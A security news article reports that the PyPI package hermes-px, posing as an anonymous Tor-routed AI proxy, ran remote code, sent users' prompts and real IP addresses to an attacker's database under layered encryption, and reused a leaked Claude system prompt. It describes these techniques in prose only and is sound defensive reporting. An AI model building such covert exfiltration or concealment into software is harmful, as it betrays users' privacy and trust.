AI Proxy or Trojan Horse? PyPI Package Unmasks Developers and Steals Sensitive Data

It looked like a gift for developers: a free, OpenAI-compatible Python package called hermes-px that routed AI requests through Tor, promising secure, anonymous inference. In reality, it was a carefully engineered trap - one that siphoned off user data, exposed real IP addresses, and leveraged stolen AI prompts, all while masquerading as a legitimate tool. The discovery, made by JFrog’s security research team, reveals the new sophistication of supply chain attacks targeting the AI developer community.

Fast Facts

• Hermes-px, a PyPI package, posed as a secure AI proxy but covertly logged user data and real IP addresses.
• The package hijacked a private university’s AI endpoint and used a stolen Anthropic Claude system prompt, poorly rebranded as “AXIOM-1.”
• User prompts and AI responses were sent directly to an attacker-controlled database, bypassing Tor and breaking promised anonymity.
• All telemetry and credentials were encrypted in multiple layers to evade detection by security scanners.
• The package’s professional documentation and seamless integration mimicked trusted AI SDKs, luring unsuspecting developers.

Beneath the Surface: Deception Disguised as Innovation

Unlike most malicious packages that betray their intent with shoddy documentation or broken code, hermes-px was a masterclass in social engineering. It offered an API nearly identical to the official OpenAI Python SDK, complete with detailed guides, error handling, and even an advanced Retrieval-Augmented Generation pipeline. The package masqueraded as a product of the fictitious “EGen Labs,” further enhancing its credibility.

But beneath the polished veneer, the rot ran deep. The package instructed users to execute arbitrary Python code from a remote GitHub repository, granting attackers the ability to update or expand their payload at will. The core of the package contained a compressed file, base_prompt.pz, which, when unpacked, revealed a massive, nearly verbatim copy of Anthropic’s confidential Claude system prompt - clumsily rebranded but still littered with original identifiers.

While AI requests were routed through Tor - ostensibly to keep users anonymous - the most sensitive telemetry was funneled directly to an attacker-controlled Supabase database. This critical data, including user questions, AI responses, and the actual IP addresses of victims, was never anonymized. Triple-layer encryption concealed the communication from static security checks, making detection exceedingly difficult.

By exploiting both the trust of the developer community and the infrastructure of an unwitting university, the attackers created an elaborate scheme that went undetected until expert analysis unraveled its true purpose. Anyone who installed hermes-px is advised to uninstall it immediately, rotate any credentials, and consider all transmitted data compromised.

Conclusion: The New Face of Open Source Threats

The hermes-px incident is a stark warning: as AI tools proliferate and open source ecosystems grow, attackers are raising their game. Even the most polished packages can hide malicious intent, exploiting trust and technical complexity in equal measure. Vigilance, skepticism, and rigorous code review are no longer optional - they are essential for survival in today’s software supply chain.

WIKICROOK

• PyPI: PyPI is the main online repository for Python software packages, allowing developers to share, download, and manage Python code easily.
• Tor Network: The TOR Network is a privacy tool that routes internet traffic through several servers, making it hard to trace users’ identities or online actions.
• System Prompt: A system prompt is a set of instructions given to an AI model to guide its behavior, responses, and ensure consistent, secure interactions.
• Exfiltration: Exfiltration is the unauthorized transfer of sensitive data from a victim’s network to an external system controlled by attackers.
• Supply Chain Attack: A supply chain attack is a cyberattack that compromises trusted software or hardware providers, spreading malware or vulnerabilities to many organizations at once.